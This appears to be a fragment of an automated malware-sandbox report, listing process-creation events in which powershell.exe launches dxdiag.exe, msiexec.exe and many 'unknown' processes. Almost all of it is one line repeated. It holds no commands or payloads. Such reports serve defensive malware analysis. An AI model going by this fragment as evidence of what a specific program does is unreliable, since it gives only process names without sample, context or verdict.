    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
